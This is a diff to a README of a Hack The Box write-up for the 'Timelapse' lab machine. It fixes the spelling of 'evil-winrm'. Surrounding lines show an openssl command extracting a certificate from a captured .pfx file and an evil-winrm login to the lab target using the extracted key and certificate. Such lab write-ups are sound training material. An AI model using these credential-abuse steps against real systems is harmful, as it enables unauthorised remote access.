vbrunschot/Write-Ups/HackTheBox/Timelapse/README.md

 openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacy.crt
 ```

 After this we alter the files by removing the header so we are only left with the key itself.
-We can now continue by using the keys to connect to the target with ```evilwin-rm``` .
+We can now continue by using the keys to connect to the target with ```evil-winrm``` .

 ```
 evil-winrm -S -k legacy.key -c legacy.crt -i 10.10.11.152